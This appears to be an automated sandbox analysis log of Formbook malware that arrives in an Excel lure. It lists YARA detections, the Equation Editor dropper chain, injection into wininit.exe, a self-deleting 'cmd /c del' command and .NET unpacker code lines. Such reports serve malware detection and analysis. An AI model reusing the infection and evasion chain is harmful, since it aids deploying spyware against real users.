          Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\Public\Pcportk28.exe | Code function: 4_2_00356226
          Source: C:\Users\Public\Pcportk28.exe | Code function: 4_2_00354368
          Source: C:\Users\Public\Pcportk28.exe | Code function: 4_2_00356C00
          Source: C:\Users\Public\Pcportk28.exe | Code function: 4_2_00356479
          Source: C:\Users\Public\Pcportk28.exe | Code function: 4_2_00356720
          Source: C:\Users\Public\Pcportk28.exe | Code function: 4_2_00354968
          Source: C:\Users\Public\Pcportk28.exe | Code function: 4_2_00358990
          Source: C:\Users\Public\Pcportk28.exe | Code function: 4_2_00358980
          Source: C:\Users\Public\Pcportk28.exe | Code function: 4_2_009E11AB
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0041C001
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00401030
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0041B8C3
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0041C948
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00408C80
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0041BD22
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00402D8A
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00402D90
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00402FB0
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0085E0C6
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0088D005
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00863040
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0087905A
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008DD06D
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0085E2E9
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00901238
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_009063BF
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0085F3CF
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008863DB
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00862305
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00867353
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008AA37B
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00895485
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00871489
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008E443E
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0089D47D
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008E05E3
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0087C5F0
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0086351F
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008A6540
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00864680
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0086E6C1
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00902622
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008AA634
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008E579A
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0086C7BC
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008957C3
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008DF8C4
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008FF8EE
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0086C85C
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0088286D
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0090098E
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008629B2
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008769FE
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008E394B
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008E5955
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00913A83
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0090CBA4
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008E6BCB
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0085FBD7
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008EDBDA
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00887B00
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008FFDDD
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_025D1238
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0252E2E9
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_02537353
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0257A37B
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_02532305
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_025563DB
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0252F3CF
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_025D63BF
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0254905A
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_02533040
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0255D005
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0252E0C6
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0257A634
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_025D2622
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0253E6C1
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_02534680
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_025657C3
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_025B579A
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0253C7BC
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0256D47D
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_025B443E
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_02565485
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_02541489
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_02576540
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0253351F7_2_0253351F
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0254C5F07_2_0254C5F0
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025E3A837_2_025E3A83
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02557B007_2_02557B00
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025BDBDA7_2_025BDBDA
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0252FBD77_2_0252FBD7
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025DCBA47_2_025DCBA4
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0253C85C7_2_0253C85C
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0255286D7_2_0255286D
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025CF8EE7_2_025CF8EE
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025B59557_2_025B5955
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025B394B7_2_025B394B
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025469FE7_2_025469FE
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025D098E7_2_025D098E
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025329B27_2_025329B2
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0254EE4C7_2_0254EE4C
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02562E2F7_2_02562E2F
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0255DF7C7_2_0255DF7C
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02540F3F7_2_02540F3F
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025A2FDC7_2_025A2FDC
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025CCFB17_2_025CCFB1
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0253CD5B7_2_0253CD5B
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02560D3B7_2_02560D3B
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025CFDDD7_2_025CFDDD
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FC9487_2_000FC948
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000E8C807_2_000E8C80
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000E2D8A7_2_000E2D8A
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000E2D907_2_000E2D90
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000E2FB07_2_000E2FB0
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: String function: 0259F970 appears 82 times
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: String function: 02573F92 appears 132 times
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: String function: 0257373B appears 245 times
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: String function: 0252E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: String function: 0252DF5C appears 119 times
          Source: C:\Users\Public\Pcportk28.exe | Code function: String function: 0085E2A8 appears 36 times
          Source: C:\Users\Public\Pcportk28.exe | Code function: String function: 008CF970 appears 78 times
          Source: C:\Users\Public\Pcportk28.exe | Code function: String function: 008A373B appears 214 times
          Source: C:\Users\Public\Pcportk28.exe | Code function: String function: 008A3F92 appears 110 times
          Source: C:\Users\Public\Pcportk28.exe | Code function: String function: 0085DF5C appears 105 times
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_004185E0 NtCreateFile
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00418690 NtReadFile
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00418710 NtClose
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_004187C0 NtAllocateVirtualMemory
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_004185DA NtCreateFile
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0041870B NtClose
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008500C4 NtCreateFile, LdrInitializeThunk
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00850048 NtProtectVirtualMemory, LdrInitializeThunk
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00850078 NtResumeThread, LdrInitializeThunk
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008507AC NtCreateMutant, LdrInitializeThunk
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0084F9F0 NtClose, LdrInitializeThunk
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0084F900 NtReadFile, LdrInitializeThunk
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0084FAD0 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0084FAE8 NtQueryInformationProcess, LdrInitializeThunk
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0084FBB8 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0084FB68 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0084FC90 NtUnmapViewOfSection, LdrInitializeThunk
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0084FC60 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0084FD8C NtDelayExecution, LdrInitializeThunk
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0084FDC0 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0084FEA0 NtReadVirtualMemory, LdrInitializeThunk
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0084FED0 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0084FFB4 NtCreateSection, LdrInitializeThunk
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008510D0 NtOpenProcessToken
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00850060 NtQuerySection
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_008501D4 NtSetValueKey
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0085010C NtOpenDirectoryObject
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00851148 NtOpenThread
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0084F8CC NtWaitForSingleObject
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00851930 NtSetContextThread
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0084F938 NtWriteFile
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0084FAB8 NtQueryValueKey
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0084FA20 NtQueryInformationFile
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0084FA50 NtEnumerateValueKey
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0084FBE8 NtQueryVirtualMemory
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0084FB50 NtCreateKey
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0084FC30 NtOpenProcess
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00850C40 NtGetContextThread
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0084FC48 NtSetInformationFile
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00851D80 NtSuspendThread
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_025200C4 NtCreateFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_025207AC NtCreateMutant, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0251FAD0 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0251FAE8 NtQueryInformationProcess, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0251FAB8 NtQueryValueKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0251FB50 NtCreateKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0251FB68 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0251FBB8 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0251F900 NtReadFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0251F9F0 NtClose, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0251FED0 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0251FFB4 NtCreateSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0251FC60 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0251FDC0 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0251FD8C NtDelayExecution, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_02520048 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_02520078 NtResumeThread
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_02520060 NtQuerySection
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_025210D0 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_02521148 NtOpenThread
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0252010C NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_025201D4 NtSetValueKey
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0251FA50 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0251FA20 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0251FBE8 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0251F8CC NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_02521930 NtSetContextThread
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0251F938 NtWriteFile
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0251FE24 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0251FEA0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0251FF34 NtQueueApcThread
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0251FFFC NtCreateProcessEx
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_02520C40 NtGetContextThread
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0251FC48 NtSetInformationFile
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0251FC30 NtOpenProcess
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0251FC90 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0251FD5C NtEnumerateKey
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_02521D80 NtSuspendThread
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000F85E0 NtCreateFile
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000F8690 NtReadFile
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000F8710 NtClose
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000F87C0 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000F85DA NtCreateFile
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000F870B NtClose
          Source: 7916.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: msvbvm60.dll
          Source: C:\Users\Public\Pcportk28.exe | Memory allocated: 76F90000 page execute and read and write
          Source: C:\Users\Public\Pcportk28.exe | Memory allocated: 76E90000 page execute and read and write
          Source: C:\Windows\SysWOW64\wininit.exe | Memory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\wininit.exe | Memory allocated: 76E90000 page execute and read and write
          Source: i4L[1].exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Pcportk28.exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
          Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exe
          Source: C:\Users\Public\Pcportk28.exe | Process created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\wininit.exe C:\Windows\SysWOW64\wininit.exe
          Source: C:\Windows\SysWOW64\wininit.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\Pcportk28.exe"
          Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$SWIFT - Copy - Copy.xlsx
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR379.tmp
          Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSX@9/6@6/5
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
          Source: C:\Users\Public\Pcportk28.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp | Binary or memory string: .VBPud<_
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Users\Public\Pcportk28.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: SWIFT - Copy - Copy.xlsx | Static file information: File size 1400294 > 1048576
          Source: Binary string: wininit.pdb source: Pcportk28.exe, 00000005.00000002.519519469.0000000000479000.00000004.00000020.sdmp, Pcportk28.exe, 00000005.00000002.519453016.0000000000380000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: Pcportk28.exe, Pcportk28.exe, 00000005.00000002.520658303.00000000009C0000.00000040.00000001.sdmp, Pcportk28.exe, 00000005.00000003.484779384.0000000000550000.00000004.00000001.sdmp, Pcportk28.exe, 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Pcportk28.exe, 00000005.00000003.485865718.00000000006B0000.00000004.00000001.sdmp, wininit.exe
          Source: Binary string: ILi.pdb source: Pcportk28.exe, Pcportk28.exe, 00000005.00000000.483141980.00000000010E2000.00000020.00020000.sdmp
          Source: SWIFT - Copy - Copy.xlsx | Initial sample: OLE indicators vbamacros = False

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: i4L[1].exe.2.dr, sb/gq.cs | .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: Pcportk28.exe.2.dr, sb/gq.cs | .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.2.Pcportk28.exe.10e0000.1.unpack, sb/gq.cs | .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.Pcportk28.exe.10e0000.0.unpack, sb/gq.cs | .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.3.unpack, sb/gq.cs | .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.10.unpack, sb/gq.cs | .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.1.unpack, sb/gq.cs | .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.4.unpack, sb/gq.cs | .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.2.unpack, sb/gq.cs | .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.0.unpack, sb/gq.cs | .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.2.Pcportk28.exe.10e0000.5.unpack, sb/gq.cs | .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.6.unpack, sb/gq.cs | .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.Pcportk28.exe.10e0000.8.unpack, sb/gq.cs | .Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          .NET source code contains method to dynamically call methods (often used by packers)
          Source: i4L[1].exe.2.dr, sb/gq.cs | .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: Pcportk28.exe.2.dr, sb/gq.cs | .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 4.2.Pcportk28.exe.10e0000.1.unpack, sb/gq.cs | .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 4.0.Pcportk28.exe.10e0000.0.unpack, sb/gq.cs | .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.3.unpack, sb/gq.cs | .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.10.unpack, sb/gq.cs | .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.1.unpack, sb/gq.cs | .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.4.unpack, sb/gq.cs | .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.2.unpack, sb/gq.cs | .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.0.unpack, sb/gq.cs | .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.2.Pcportk28.exe.10e0000.5.unpack, sb/gq.cs | .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.6.unpack, sb/gq.cs | .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: 5.0.Pcportk28.exe.10e0000.8.unpack, sb/gq.cs | .Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
          Source: C:\Users\Public\Pcportk28.exe | Code function: 4_2_010E9A2A push es; retf 4_2_010E9A37
          Source: C:\Users\Public\Pcportk28.exe | Code function: 4_2_010E9767 push 3A000004h; retf 0000h 4_2_010E976C
          Source: C:\Users\Public\Pcportk28.exe | Code function: 4_2_010EA0FF push es; iretd 4_2_010EA151
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0041B822 push eax; ret 5_2_0041B828
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0041B82B push eax; ret 5_2_0041B892
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0041B88C push eax; ret 5_2_0041B892
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_004153E0 push es; retf 5_2_004153E9
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00415C4E push ebp; ret 5_2_00415C57
